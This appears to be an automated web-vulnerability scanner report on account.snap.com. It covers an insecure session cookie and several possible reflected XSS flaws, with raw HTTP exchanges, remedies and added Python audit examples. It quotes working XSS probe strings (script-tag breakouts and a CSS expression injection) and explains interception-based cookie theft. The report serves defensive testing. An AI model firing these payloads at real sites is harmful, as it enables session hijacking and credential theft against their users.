<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/importsettings.php#" + currentTab);} else { urchinTracker();}</script></div></body></html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A cookie was set over HTTPS without the Secure flag. The browser will therefore also send it over plain HTTP, so an attacker who can intercept the victim's traffic, or who has mounted a successful MITM (man-in-the-middle) attack, can obtain the cookie without having to break the TLS session at all.

Impact

This cookie will also be transmitted over unencrypted HTTP connections, so if it is important (for example a session cookie) an attacker who can observe the traffic can intercept it and hijack the victim's session. An attacker who can carry out a MITM attack does not need to wait for the victim to visit an http:// URL: they can inject a plain HTTP request to the site into any unencrypted page the victim loads and read the cookie from that request.

Actions to Take

  1. See the remedy for the solution.
  2. Mark all cookies used within the application as Secure. (A cookie that is not related to authentication and carries no personal information does not strictly need the flag.)

Remedy

Mark all cookies used within the application as Secure. For a PHP session cookie such as PHPSESSID this means the Set-Cookie header must carry the Secure attribute; the header shown below for /login.php carries only path=/. Session cookies should be marked HttpOnly as well, so that script injected through an XSS issue cannot read them.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires access to the victim's network or to a system on the path between the victim and the web server: the attacker must understand layer 2 (for example ARP spoofing on a shared LAN), have physical access to systems that act as way points for the traffic, or have gained access to a system between the victim and the web server.
- /login.php

/login.php CONFIRMED

https://account.snap.com/login.php

Identified Cookie

PHPSESSID

Request

GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 21:07:51 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=3807e7a155fa600b1bf882a69d2f4cde; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 3483
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<div id="top-cap"></div><div id="wrapper"><div id="leftSide"><h1>Log in to your Snap Account</h1><div id="colCombine"> <form id="login" name="login" action="/login.php" method="post"> <p>If you don't have a Snap account, start by <a href="/signup.php">creating one</a>.</p> <ul id="enterInfo"> <li> <h2>Please Enter Your Email and Password</h2> </li> <li> <h5>Your Email:</h5> <input tabindex="1" type="text" id="enter" class="text" name="email" value=""> </li> <li> <h5>Your Password: <span><a tabindex="5" href="forgot_password.php">Forgot your password?</a></span></h5> <input tabindex="2" type="password" class="text" name="password" value=""> </li> <li id="remember"> <input tabindex="3" name="remember_me" value="1" type="checkbox"> Remember Me <small>(on this computer until you log out)</small> </li> <li class="btn"> <input tabindex="4" type="image" name="submit" src="/images/btn-login.gif" width="181" height="31" alt="Log In" title="Log In" /> </li> </form> <li class="dotted"> <p> <h5>Already have Snap Shots on your site but no account?</h5> <a tabindex="6" href="/importsettings.php">Click here</a> to create an account based on your current settings. </p> </li> </ul></div></div><div id="rightSide"><div class="sidebar"><h4>Recent Blog Posts</h4></div><div class="sidebar2"><h4>Special Offers</h4><a href="http://www.atomz.com/snap.html"><img src="images/atomz_ad.jpg" alt="Atomz - Free Site Search for Your Website" border="0" width="180" height="150" /></a></div></div><div class="clear"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/login.php#" + currentTab);} else { urchinTracker();}</script><form id="login_form" method="POST" action="login.php"> <input type="hidden" name="tab" value="1"></form></div><script>document.getElementById("enter").focus();</script></body></html>
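The check a tester would run against the /login.php response above, as an added example (not part of the Netsparker report or of Snap's code): parse every Set-Cookie header in a raw HTTP response and report cookies that lack the Secure or HttpOnly attribute. The first response is a constructed copy of the Set-Cookie line shown above; the second is an assumed corrected version of the same header.

```python
"""Audit Set-Cookie headers for the Secure and HttpOnly attributes.

Added example for this report, not part of Netsparker's or Snap's code. The
first response below is a constructed copy of the Set-Cookie line that
/login.php returned above; the second is an assumed corrected version.
"""

VULNERABLE_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8\r\n"
    "Set-Cookie: PHPSESSID=3807e7a155fa600b1bf882a69d2f4cde; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Assumed fix: the same cookie with both flags set (session.cookie_secure and
# session.cookie_httponly in php.ini produce exactly this header).
HARDENED_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Set-Cookie: PHPSESSID=3807e7a155fa600b1bf882a69d2f4cde; path=/; Secure; HttpOnly\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
)


def parse_set_cookies(raw_response):
    """Return one dict per Set-Cookie header: cookie name, value and a dict of
    attributes keyed by lower-cased attribute name (bare flags map to '')."""
    head = raw_response.partition("\r\n\r\n")[0]
    cookies = []
    for line in head.split("\r\n")[1:]:           # [0] is the status line
        header, sep, body = line.partition(":")
        if not sep or header.strip().lower() != "set-cookie":
            continue
        parts = [p.strip() for p in body.split(";")]
        name, _, value = parts[0].partition("=")
        attrs = {}
        for attr in parts[1:]:
            key, _, val = attr.partition("=")
            attrs[key.strip().lower()] = val.strip()
        cookies.append({"name": name.strip(), "value": value.strip(), "attrs": attrs})
    return cookies


def audit_cookies(raw_response, served_over_https=True):
    """Return one finding string per missing flag; an empty list means every
    cookie carries Secure (when served over HTTPS) and HttpOnly."""
    findings = []
    for cookie in parse_set_cookies(raw_response):
        if served_over_https and "secure" not in cookie["attrs"]:
            findings.append(f"{cookie['name']}: missing Secure")
        if "httponly" not in cookie["attrs"]:
            findings.append(f"{cookie['name']}: missing HttpOnly")
    return findings


if __name__ == "__main__":
    for label, response in (("vulnerable", VULNERABLE_RESPONSE),
                            ("hardened", HARDENED_RESPONSE)):
        print(label, audit_cookies(response) or ["no findings"])
```

Both flags cost nothing on a site that is already served entirely over HTTPS, as account.snap.com is. In PHP 5.2 they can be enabled without touching application code through session.cookie_secure = 1 and session.cookie_httponly = 1 in php.ini, or with session_set_cookie_params() before session_start().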
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

3 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes there is an XSS (Cross-site Scripting) issue here but could not confirm it. We strongly recommend investigating the issue manually to determine whether it is an exploitable XSS (Cross-site Scripting) that needs to be addressed.

XSS targets the users of the application rather than the server. Although this limits the attack, it still allows an attacker to hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including hijacking the victim's active session, changing what the victim sees by rewriting the page's HTML on the fly, and using such a rewritten page to steal the user's credentials.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input to the application should be validated and all output should be encoded. Output must be encoded according to the output format and location: a value placed in an HTML attribute, in text content, inside a script block or in a URL each needs a different encoding, and a single encoding does not cover all of these contexts.

There are a number of well structured, white-list based encoding libraries available for many different environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.
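The two output contexts visible in the confirmed /importsettings.php responses above are a double-quoted value attribute of a hidden input and the text of a list item; the probe ends the attribute with a quote and then opens a real script tag. As an added example (a constructed stand-in for the PHP page, whose source is not on this page, not Snap's or Netsparker's code), the following shows that reflection pattern beside a version encoded for those contexts, together with the manual check recommended above for a [Possible] finding: replay the probe and look for it verbatim in the body.

```python
"""Reflected XSS in importsettings.php: vulnerable vs. encoded rendering, plus
the manual replay check for a [Possible] finding.

Added example for this report; a constructed stand-in for the PHP page, whose
source is not shown. The two output contexts are the ones visible in the
responses above: a double-quoted value attribute and list-item text.
"""
import html
import re

# The probe exactly as sent in the confirmed /importsettings.php requests above.
PAYLOAD = "'\"--></style></script><script>netsparker(0x000248)</script>"

SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)


def render_vulnerable(email, key):
    """Values inserted raw, as the page above does: a ' or " ends the attribute
    and a < starts a tag, so the probe's <script> survives intact."""
    return (
        f'<input type="hidden" name="email" value="{email}">'
        f'<input type="hidden" name="key" value="{key}">'
        f'<h5>Email</h5> {email} <h5>Site URL</h5> {key}'
    )


def render_hardened(email, key):
    """Same markup with output encoding chosen for the contexts used. html.escape
    with quote=True turns & < > " ' into entities, which is the correct encoding
    for both a double-quoted attribute value and ordinary text content. It would
    NOT be enough for a value placed inside a <script> block or a URL."""
    e, k = html.escape(email, quote=True), html.escape(key, quote=True)
    return (
        f'<input type="hidden" name="email" value="{e}">'
        f'<input type="hidden" name="key" value="{k}">'
        f'<h5>Email</h5> {e} <h5>Site URL</h5> {k}'
    )


def reflected_unencoded(body, probe):
    """The manual check the report recommends for a [Possible] finding: replay the
    probe and look for it verbatim in the response body. True means the page
    reflects it without encoding."""
    return probe in body


def count_script_tags(body):
    """Number of opening <script tags in the body; injected markup adds to it."""
    return len(SCRIPT_OPEN.findall(body))


def round_trips(value):
    """Encoding must not corrupt the value: the browser decodes entities in the
    attribute, so the hidden field still resubmits exactly what was entered."""
    return html.unescape(html.escape(value, quote=True)) == value


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        body = render("netsparker@example.com", PAYLOAD)
        print(f"{label}: reflected unencoded={reflected_unencoded(body, PAYLOAD)}, "
              f"script tags={count_script_tags(body)}")
```

The PHP equivalent at every output point is htmlspecialchars($value, ENT_QUOTES, 'UTF-8'). The same attribute encoding covers a form action built from the request URI, which is how the raw path reaches the action attribute in the /add_site.php/ finding below.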

- /add_site.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

/add_site.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

https://account.snap.com/add_site.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

Parameters

Parameter Type Value
URI-BASED Raw URI /" stYle="x:expre/**/ssion(alert(9))

Notes

This page responds with an HTTP redirect status, so the detected XSS might not be exploitable under many conditions: a browser normally follows the Location header instead of rendering the redirect body. It still indicates a lack of correct filtering and should be addressed. In the response body the raw request URI is written unencoded into the action attribute of the setup form, which is where the injected quote and style attribute land.

Request

GET /add_site.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: https://account.snap.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Cookie: PHPSESSID=5785bfecc05e8df1ec358b638a7b4947
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Found
Date: Sat, 23 Jul 2011 22:29:22 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login.php
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'setup';</script><script type="text/javascript" src="/javascript/jquery.js"></script>

<div id="top-cap"></div>
<div id="wrapper">


<div class="clear"></div>
<div id="leftSide">
<ul id="tabs"><li><span class="tab-on">Site Info</span></li><li><span class="">Customization</span></li><li><span class="">Installation</span></li><li><span class="tab-off">Snap Shares&trade;</span></li> </ul>
<div id="statusInfo">
</div>

<form id="setup_form" name="setup_form" action="/add_site.php/" stYle="x:expre/**/ssion(netsparker(9))" method="post">


<div id="column2">
<div id="terms">
<h2>Terms & Conditions</h2>
<textarea name="terms" readonly="readonly" value="">Snap Shots Terms of Use PolicyPLEASE READ VERY CAREFULLY THESE TERMS OF USE FOR THE SNAP SHOTS PROGRAM, INCLUDING THE SNAP SHARES FEATURES, BEFORE REGISTERING. PARTICIPATION IN THIS PROGRAM INDICATES THAT YOU ACCEPT THESE TERMS AND CONDITIONS. IF YOU DO NOT ACCEPT THESE TERMS AND CONDITIONS, PLEASE DO NOT REGISTER TO PARTICIPATE IN THE SNAP SHARES ONLINE PROGRAM. 1. Program Participation. In order to participate in the Snap Shots Program, including Snap Shares (the "Program"), participants ("You" and "Your") will need to complete a set up procedure with Snap Technologies, Inc. ("Snap"), and in order to use the Snap Shares features, you will also have to provide your account information for an active account with third party advertising service provider such as Commission Junction or Amazon.com Associates. Snap reserves the right to refuse participation to any applicant or participant at any time in its sole discretion. By enrolling in the Program, You agree to comply with the then applicable policies ("Policies"), found at http://www.snap.com/snapshots_faq.php, and agree that Snap may serve advertisements, links and search result information (collectively the "Ads") in combination with the Snap Shot technology available on your Web Site (the "Site" or "Site(s)"). You agree to comply with the specifications provided by Snap from time to time to enable proper display, tracking, and delivery of the Program.2. Program Rules and Restrictions. The Program is designed to allow You to make some choices about how the Program will appear on Your Web Site. The Program will also allow you to select some of the ads to serve on Snap Shots from the list of available choices, if you choose to Participate in Snap Shares. 
Snap retains the right, in its sole discretion, to set the rules for all ad runs (and of course, we will attempt to choose to show ads relevant to your Site's content) and the right to restrict or limit the types of ads available for different types of Sites. In addition, the Snap Share Program may not work all the time or with all Snap Shot features.3. Program Changes and Updates. Snap reserve the right, in our sole discretion, to change all or part of these Terms and Conditions and/or the Policies and to change or discontinue the Program at any time, with or without notice. Your continued participation in the Program will constitute your acceptance of the then-current terms and conditions and Policies. You are responsible to check for updates. Changes and updates to these Terms will be effective immediately after they are posted at: https://account.snap.com/print_terms.php.4. Your Representations, Warranties and Responsibilities. As of the date that you enter into the Program and for as long as you participate, you represent warrant and covenant that: A. You are the registered owner of the Site(s), including the domain names and all content contained therein or that You are legally authorized to act on behalf of the owner of such Site(s) for the purposes of this Agreement and the Program; B. Your participation in the is subject to compliance Snap's Policies including suitable content and that violation of a Policy will constitute a material breach of these Terms & Conditions; C. You will abide by all applicable laws, rules and regulations and you will not display or use any content that would infringe the rights of any third party including copyright or trademark laws; D. You are solely responsible for the operation of Your Site(s), including all content and materials, maintenance and operation thereof. Snap is not responsible for anything related to Your Site(s). 5. Prohibited Uses. In order to ensure a successful Program for all participants, You shall not: A. 
Use the Program for any automated, deceptive, fraudulent or other invalid mean; to damage, disable, overburden, or impair Snap's or any other party's search services, servers, or other equipment or services; or to act in any way that violates any Program Policies posted on the Snap Web Site, as may be revised from time to time, or any other agreement between You and Snap (including without limitation the Snap Affiliate Agreement); B. Modify the Snap Shots or Ads in any way including displaying content that may obscure the appearance of the Snap Shots or result in the accidental clicking on the Ads; C. Use Snap Shots, Ads or Snap code on a site that does not belong to You; D. Use Snap Shots or Ads in conjunction with framing any webpage that is not within Your Site(s); E. Cache Snap Shots or Ads; F. Click on any Ads provided by Snap for Your Site(s) or provide and incentive or encouragement to users of the Sites(s) to click on Ads, including but not limited to language directing users to click on the Ads or informing users that they can support Your Site clicking on the Ads; G. Use, authorize or enable any automated means of generating impressions or clicks on Snap Shots or Ads or any manual means of generating fraudulent or invalid Snap Shot impressions or Ad clicks; H. Interfere with the intended behavior of the ads such as redirecting the user who has clicked on a Snap Shot or Ad; I. Modify Snap code in any way; J. Engage in any action or practice that reflects poorly on Snap or otherwise disparages or devalues Snap's reputation or goodwill.You acknowledge that any attempted participation or violation of any of the foregoing is a material breach of this Agreement and that we may pursue any and all applicable legal and equitable remedies against You, including an immediate suspension of Your account or termination of this Agreement, and the pursuit of all available civil or criminal remedies. 6. Termination; Cancellation. 
You may stop using this Program at any time by removing snap code and providing us with written notice to customerservice@snap.com. Snap reserves the right to terminate your participation in the Program at any time without liability to you or any third party and may require You to remove Snap JavaScript or similar code from Your Site(s) upon our request. Snap may at any time, in its sole discretion, also terminate or suspend all or part of the Program for any reason.7. No Warranty. SNAP MAKES NO WARRANTY, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION WITH RESPECT TO THE PROGRAM, OR THE ADVERTISING FEATURE THEREIN, AND EXPRESSLY DISCLAIMS THE WARRANTIES OR CONDITIONS OF NONINFRINGEMENT, MERCHANTABILITY, FITNESS FOR ANY PARTICULAR PURPOSE, OR ACCURACY OF INFORMATIONAL CONTENT. SNAP MAKES NO WARRANTY THAT THE SITE WILL MEET YOUR REQUIREMENTS, OR THAT SERVICES WILL BE UNINTERRUPTED, TIMELY, SECURE OR ERROR FREE, NOR DOES SNAP MAKE ANY WARRANTY AS TO THE RESULTS THAT MAY BE OBTAINED FROM THE USE OF THE PROGRAM OR THAT ALL DEFECTS WILL BE CORRECTED. 8. LIMITATIONS OF LIABILITY. IN NO EVENT WHATSOEVER SHALL SNAP, ITS PARENT COMPANY, SHAREHOLDERS, AFFILIATES, SUPPLIERS OR THEIR RESPECTIVE EMPLOYEES, SHAREHOLDERS, AGENTS, OR REPRESENTATIVES BE LIABLE FOR ANY INDIRECT, CONSEQUENTIAL, INCIDENTAL, SPECIAL, PUNITIVE OR EXEMPLARY DAMAGES, OR FOR ANY LOSS OF PROFITS OR REVENUE, INCLUDING BUT NOT LIMITED TO LOSS OF SALES, PROFIT, REVENUE, GOODWILL, OR DOWNTIME, (HOWEVER ARISING IN TORT, CONTRACT, OR OTHERWISE) REGARDLESS OF SUCH PARTY'S NEGLIGENCE OR WHETHER SUCH PARTY KNEW OR SHOULD HAVE KNOWN OF THE POSSIBILITY OF SUCH DAMAGES. YOU UNDERSTAND AND AGREE THAT THE USE OF THIS SITE IS AT YOUR DISCRETION AND RISK AND THAT YOU WILL BE SOLELY RESPONSIBLE FOR ANY LOSS OR DAMAGE TO YOUR COMPUTER SYSTEM OR LOSS OF DATA THAT MAY RESULT FROM YOUR USE OF THE SITE. 
SNAP NEITHER ASSUMES, NOR AUTHORIZES ANY OTHER PARTY TO ASSUME ON ITS BEHALF, ANY OTHER LIABILITY IN CONNECTION WITH THE PROVISION OF THE SITE. THE LIMITATIONS OF LIABILITY PROVIDED IN THIS AGREEMENT INURE TO THE BENEFIT OF SNAP, ITS PARENT COMPANY, SHAREHOLDERS, AFFILIATES AND TO ALL OF ITS RESPECTIVE OFFICERS, DIRECTORS, EMPLOYEES, ATTORNEYS AND AGENTS. IN NO EVENT SHALL SNAP'S TOTAL CUMULATIVE LIABILITY UNDER THIS AGREEMENT EXCEED US$50. SOME STATES OR OTHER JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO PORTIONS OF THE FOREGOING MAY NOT APPLY TO YOU, BUT THEN LIABILITY SHOULD BE LIMITED TO THE FULL EXTENT OF THE LAW. 9. Force Majeure. Neither party shall have any liability for any failure or delay resulting from any condition beyond the reasonable control of such party, including but not limited to governmental action or acts of terrorism, earthquake or other acts of God, labor conditions, and power failures. 10. Indemnification. You agree to indemnify and hold Snap and its affiliates and each of their employees, contractors, agents, officers, and directors harmless, including reasonable attorneys' fees, from any claim or demand made by any third party in connection with or arising out of your use of the Program, your violation of any term, condition, representation, or warranty contained in this Terms of Use, your violation of applicable laws, or your violation of the rights of any other person or entity.11. Intellectual Property Rights. You acknowledge that Snap owns all right, title and interest, including without limitation all Intellectual Property Rights (as defined below), in and to the Program (excluding items licensed by Snap from third parties), and that You will not acquire any right, title, or interest in or to the Program. 
You will not modify, adapt, translate, prepare derivative works from, decompile, reverse engineer, disassemble or otherwise attempt to derive source code from any Snap services, software, or documentation, or create or attempt to create a substitute or similar service or product through use of or access to the Program or proprietary information related thereto. You will not remove, obscure, or alter Snap's copyright notice, Brand Features, or other proprietary rights notices affixed to or contained within any Snap services, software, or documentation (including without limitation the display of Snap's Brand Features with Ads, Links, Search Boxes, Search Results, and/or Search Buttons, as applicable). "Intellectual Property Rights" means any and all rights existing from time to time under patent law, copyright law, moral rights law, trade secret law, trademark law, unfair competition law, publicity rights law, privacy rights law, and any and all other proprietary rights, as well as, any and all applications, renewals, extensions, restorations and re-instatements thereof, now or hereafter in force and effect worldwide. 12. Use of Information. During your participation in the Program, Snap's technology will collect, store and send information back to Snap or third party servers, including referring URL's, crawled content of your Sites(s), user IP addresses, impressions, click throughs and search queries. Snap will use that information to operate the Program and may share that data with third parties. In addition, Snap may retain and use the information you provide from registering for the Program, subject to the terms of the Snap Privacy Policy (located at http://www.snap.com/about/privacy.php or such other URL as Snap may provide from time to time), including but not limited to Site demographics and contact and billing information. 
You agree that Snap may transfer and disclose to third parties personally identifiable information about You for the purpose of approving and enabling Your participation in the Program. Snap may also provide information in response to valid legal process, such as subpoenas, search warrants and court orders, or to establish or exercise its legal rights or defend against legal claims. Snap disclaims all responsibility, and will not be liable to You, however, for any disclosure of that information by any such third party. Snap may share non-personally-identifiable information about You, including Site URLs, Site-specific statistics and similar information collected by Snap, with advertisers, business partners, sponsors, and other third parties. In addition, if you sign up for Snap Shares Program, you will provide account information for your advertising service provider. Snap will use you account code to keep track of visitor traffic (click throughs) so You can get credit.13. Confidentiality. You will not disclose or use Snap's Confidential Information. "Confidential Information" means without limitation: (a) all Snap software, technology, programming, specifications, materials, guidelines and documentation relating to the Program; (b) operational metrics of your participation in the Program; and (c) any other information designated by Snap as "Confidential". Confidential Information does not include information that has become publicly known through no breach by You or Snap, or information that has been (i) independently developed without access to Snap Confidential Information, as evidenced in writing; (ii) rightfully received by You from a third party; or (iii) required to be disclosed by law or by a governmental authority. You acknowledge that Snap is under no obligation to mark any materials "Confidential" in order for you to treat such information as Confidential. 14. Miscellaneous. 
This Agreement shall be governed by the laws of California, except for its conflicts of laws principles. Any dispute or claim arising out of or in connection with this Agreement shall be adjudicated in Los Angeles, California. Following Termination, the following sections shall survive: 4, 10, 11, 12 and 13. This Agreement constitutes the entire agreement between the parties with respect to the subject matter hereof. If any provision herein is held unenforceable, then such provision will be modified to reflect the parties' intention, and the remaining provisions of this Agreement will remain in full force and effect. Continued use of or visits to the Site constitutes acceptance of any modified terms and conditions. You may not assign your rights or delegate your responsibilities hereunder without the express written permission of Snap. Snap may, at any time, assign its rights or delegate its obligations hereunder without notice to you. No person not a party to this Agreement is intended to be a beneficiary of this Agreement, and no person not a party to this Agreement shall have any right to enforce any term of this Agreement.</textarea>
<div>
<input name="accept_terms" value="1" type="checkbox"> <b>I agree to Terms & Conditions above.</b><span class="red">*</span>
</div>
<div>
<a href="javascript:window.open('/print_terms.php', 'print_terms', 'width=500,height=600,scrollbars=yes,resizeable,menubar=1'); void(0);">Print Terms & Conditions</a>
</div>
<div class="clear"></div>
</div>

<!--
<h2>Describe Your Site & Audience</h2>



<ul>
<li>Select the Primary Category of Your Site:<br />
<select class="text" name="shots_category1"> <option value=""></option> <option value="Arts & Entertainment">Arts & Entertainment</option> <option value="Automotive">Automotive</option> <option value="Business & Finance">Business & Finance</option> <option value="Computing & Technology">Computing & Technology</option> <option value="Education">Education</option> <option value="Employment">Employment</option> <option value="Games">Games</option> <option value="Health">Health</option> <option value="Lifestyle">Lifestyle</option> <option value="Online Shopping">Online Shopping</option> <option value="Personal">Personal</option> <option value="Politics & News">Politics & News</option> <option value="Real Estate">Real Estate</option> <option value="Relationships">Relationships</option> <option value="Religion">Religion</option> <option value="Sexually Explicit">Sexually Explicit</option> <option value="Sports">Sports<..
- /add_site.php

/add_site.php

https://account.snap.com/add_site.php

Parameters

Parameter Type Value
shots_age_range POST Under 13 years
shots_category1 POST 3
shots_category2 POST 3
shots_gender POST Primarily Male
shots_geography POST Africa
url POST '"--></style></script><script>alert(0x0004CC)</script>

Notes

This page responds with an HTTP redirect status; therefore the detected XSS vulnerability might not be exploitable in many conditions. However, it still indicates a lack of correct output filtering and should be addressed.

Request

POST /add_site.php HTTP/1.1
Referer: https://account.snap.com/add_site.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: account.snap.com
Cookie: PHPSESSID=4329620185993f511f5aa3410492abe9
Content-Length: 207
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

shots_age_range=Under+13+years&shots_category1=3&shots_category2=3&shots_gender=Primarily+Male&shots_geography=Africa&url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004CC)%3c%2fscript%3e

Response

HTTP/1.0 302 Found
Date: Sat, 23 Jul 2011 22:39:37 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login.php
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Snap Account Signup</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<script>var currentTab = 'setup';</script><script type="text/javascript" src="/javascript/jquery.js"></script>

<div id="top-cap"></div>
<div id="wrapper">


<div class="clear"></div>
<div id="leftSide">
<ul id="tabs"><li><span class="tab-on">Site Info</span></li><li><span class="">Customization</span></li><li><span class="">Installation</span></li><li><span class="tab-off">Snap Shares&trade;</span></li> </ul>
<div id="statusInfo">
<h3>Add Shots to a New Site</h3> <p class="alert">No user found with that email</p> </div>

<form id="setup_form" name="setup_form" action="/add_site.php" method="post">


<div id="column2">
<div id="terms">
</div>

<!--
<h2>Describe Your Site & Audience</h2>



<ul>
<li>Select the Primary Category of Your Site:<br />
